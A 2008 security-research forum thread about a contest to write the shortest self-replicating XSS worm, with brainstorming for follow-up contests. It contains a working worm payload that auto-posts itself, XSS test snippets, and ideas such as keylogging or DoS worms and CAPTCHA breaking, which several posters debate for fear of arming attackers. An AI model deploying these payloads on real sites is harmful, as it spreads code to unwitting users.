Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920
Current Page: 20 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 11, 2008 03:51PM

@rsnake

re code:-
<img src="" onerror="write('<body><b>Hello</b>');close();alert(body.innerHTML)" />

I don't think it even matters if there is a <body> tag anyways. Maybe on IE

When is someone gonna signup to slackers with morpheus as a username then we can ask for the red pill :)

"The Matrix is everywhere, it is all around us. Even now, in this very room. You can see it when you look out your window, or when you turn on your television. You can feel it when you go to work, or when go to church or when you pay your taxes. It is the world that has been pulled over your eyes to blind you from the truth."

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 04:29PM

I think we have a neo - but I also think _any_ forum has a neo :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 08:16PM

lol... I almost choked on my tortillas and a fine ale here.. :))

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 12, 2008 11:33AM

@Gareth - true that does work, but there you aren't making an assumption about a body tag since you are putting it there. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 13, 2008 04:52AM

Quote

dbloom - 252 Posts to the wrong page (resides in the same directory)
<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>

The rules said:
Quote

2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.
A page called post.php on the same domain means this to me: domain.tld/post.php
And I asked about it here: http://sla.ckers.org/forum/read.php?2,18790,page=10#msg-19113

I'm not asking you to disqualify everyone else or anything (that would be really unfair), but I don't think I broke the rules here.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 13, 2008 11:14AM

@dbloom - this wouldn't have won either way, or I may have considered it since it would have actually been shorter just to delete it. Either way, it was a nice submission!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 13, 2008 02:58PM

@rsnake

When is the next one? I need something to satisfy my boredom

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 13, 2008 09:11PM

Well - what do you guys think would be a good contest? I'll take suggestions if you guys have something you'd like to see done. Obviously it would have to be challenging and fun for everyone involved.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 13, 2008 11:47PM

I think we should continue with worms, but rather then make it diminutive lets go for polymorphism or C&C's

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 13, 2008 11:59PM

Ideas for another contest:
* Some characters should be disallowed or mangled in some way (PHP magic quotes, anyone?)
* Having a popular Javascript library preinstalled on the target site
* A multi-site worm (must spread to different domains that are vulnerable under different attack vectors if the user is logged into said sites, presumably using IFRAMEs)
* Fixed number of generations - the worm must spread exactly (n) times then stop.
* Multiple small input fields - the worm must be made of 100 byte maximum chunks that are not necessarily presented in any order

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Kyran
Date: January 14, 2008 02:04AM

dbloom Wrote:
-------------------------------------------------------
> Ideas for another contest:
> * Some characters should be disallowed or mangled
> in some way (PHP magic quotes, anyone?)
> * Having a popular Javascript library preinstalled
> on the target site
> * A multi-site worm (must spread to different
> domains that are vulnerable under different attack
> vectors if the user is logged into said sites,
> presumably using IFRAMEs)
> * Fixed number of generations - the worm must
> spread exactly (n) times then stop.
> * Multiple small input fields - the worm must be
> made of 100 byte maximum chunks that are not
> necessarily presented in any order

No offense, but I seriously doubt any of these are contest-esque. I can see them as interesting topics, perhaps.
(The last one is my favorite. add to window.var, setinterval, if window.var.length=x, eval(window.var);clearinterval, etc. )

- Kyran

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 14, 2008 02:28AM

I agree with Kyran - the last one sounds most promising. I also like the idea with certain forbidden characters - quotes would be a candidate for that. But anyway - let's brainstorm a bit before we lock on creating another worm next time. What about a data-miner, a spider etc. ?

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 14, 2008 03:10AM

How about a unsolvable problem like a CAPTCHA? See what we can come up with

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 14, 2008 08:05AM

Or gathering most functionality inside a fixed amount of characters. Let's say the code may have 400 characters and has several optional tasks to solve. E.g.:

- Logging keys
- Communicating with another site
- Keeping the user on the site
- Obfuscating the status bar content
- Mutate etc...

Any of those sub-quests can be given a nn% score and the code has to match several rules like running on IE7/FF - also with optional bonus scores for Opera, Safari etc.

It would on the one hand be relatively easy to judge and on the other hand a big problem to solve for the contestants.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 14, 2008 10:10AM

How about a team based challenge as well?

Other ideas:-
-Browser crashing
-SOP Bypass
-Filter challenge
-DOS Worm
-XSS Virus

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 14, 2008 10:57AM

Thing is IMHO we shouldn't try too hard to put the focus on malicious code.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 14, 2008 11:58AM

Haha, yeah I agree with .mario. How about more of a "stop this worm" contest than a "DoS worm" contest. The diminutive worm contest was academic, because it doesn't really arm anybody with potential weapons. It was very "proof of concept" and not so employable (especially for those who are not already proficient in this area). I don't expect seeing any of these payloads in the next major XSS worm. How about a contest that will produce some new thoughts and perhaps a few papers. We're here to better the field, right?

-Dan

EDIT: I would also like to say that I think the contest should be very open. It should be one in which the final result can be achieved in numerous ways, and the entries should be posted publicly for a sort of collaboration (just like the last contest). It should be on a topic that we don't feel completely comfortable with- something we haven't "mastered".



Edited 1 time(s). Last edit at 01/14/2008 12:09PM by DoctorDan.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 14, 2008 03:07PM

Absolutely agree with the above comments. The last thing we should do is arm "Script Kiddies" with ammo that they can bring down sites with.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 14, 2008 03:30PM

Yeah I agree I don't want to arm script kiddies but on the other hand I don't want to stop researching cool security stuff. I think if we find a good balance like the previous contest it would be cool

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 14, 2008 05:03PM

The worm contest was designed to help us solve a problem by getting lots of potential candidates so we could examine the way in which worms are written and in my mind we solved it. Let's move onto the next problem. I did like the CAPTCHA thing. One thing I have been wrestling with for years now is a way to mathematically or logically explain why CAPTCHAs can't work (at least not as real Turing test) so we can stop talking about them. In lieu of that, it would actually be kinda fun to build a few CAPTCHAs and have everyone submit code that will break it. The highest percentage of successful solutions wins. The only catch here is that the code (like PWNTcha) would have to be portable and work on multiple CAPTCHAs. The more the better.

The downside is that it would definitely empower a lot of spammers, so perhaps that idea is out.

Similar candidates would be welcome.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Kyran
Date: January 15, 2008 12:36AM

Maybe we should stop naming these contests, just to lessen the drama...
Anyways, I totally agree with trying to play with CAPTCHAs more.
Perhaps someone could write xss.php and captcha.php, the former just being an easily xssable page and the latter being a page that will generate different variations of captchas(?mode=1/2/3) and the goal is to perform an action and bypass the captcha purely in Javascript and/or with as little interaction as possible.

- Kyran

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 15, 2008 09:36AM

I have developed a CAPTCHA system in PHP, but have yet to find any place that I could test the "strength" of the image. I looked at the PWNtcha site, but sadly you can't upload images there.

Does anyone know of such a site?

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 15, 2008 04:43PM

Matt:
www.puremango.co.uk has a captcha breaker some where

Greetz!!

*edit*

http://www.puremango.co.uk/_acdc_breakcaptcha.php

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/15/2008 04:44PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 16, 2008 08:28AM

Thanks sdc. Guess I will have to look at it at home. Work here has blocked it.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 22, 2008 08:32PM

How about a challenge to find a Flash based vulnerability, it's a good way of learning it while you do it. My experience with Flash is only on the design side, i haven't exploited it yet or even glanced at it. or a LiveConnect Javascript exploit (it's tough lemme tell ya.) such stuff would be fun, and it gives a reason to get of our asses. :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 23, 2008 10:54AM

Ronald's could be a good idea, and since Flash can bypass the SOP, the winners would be determined by their ability to post some text, possibly their user name and date, to another site.

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920
Current Page: 20 of 20


Sorry, only registered users may post in this forum.